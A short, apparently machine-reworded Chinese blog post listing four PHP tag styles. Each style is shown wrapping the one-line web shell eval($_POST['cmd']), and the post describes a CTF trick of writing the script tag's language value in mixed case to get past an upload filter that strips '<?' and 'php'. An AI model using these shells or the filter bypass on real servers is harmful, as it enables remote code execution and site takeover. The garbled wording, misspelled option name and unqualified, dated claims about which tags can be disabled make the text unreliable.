【后端开辟】PHP的标识有哪几种

PHP的标识有4种作风

XML作风 (引荐进修:PHP视频教程)

<?php
eval($_POST['cmd']); 
?>

php引荐运用的标记作风。

服务器管理员没法禁用,一切服务器上都可运用该作风。

剧本作风

<script language="php">
    eval($_POST['cmd']);
</script>

默许开启,没法禁用

笔者曾遇到过一CTF问题,请求上传shell,然则却对文件内容做了过滤 ,<? 以及 php,替代为了空格。此种作风中,language的值,大小写都能够,因而能够组织以下代码举行绕过

<script language="PhP">
    eval($_POST['cmd']);
</script>

简短作风

<? 
eval($_POST['cmd']);
?>

此种作风需要在配置文件php.ini中启用short_open_tage选项

此种作风在很多环境中默许是不支持的

ASP作风

<% 
eval($_POST['cmd']);
%>

此种作风需要在配置文件php.ini中启用asp_tag选项

在默许情况下是禁用的

以上就是PHP的标识有哪几种的细致内容,更多请关注ki4网别的相干文章!

点赞

发表评论

电子邮件地址不会被公开。必填项已用 * 标注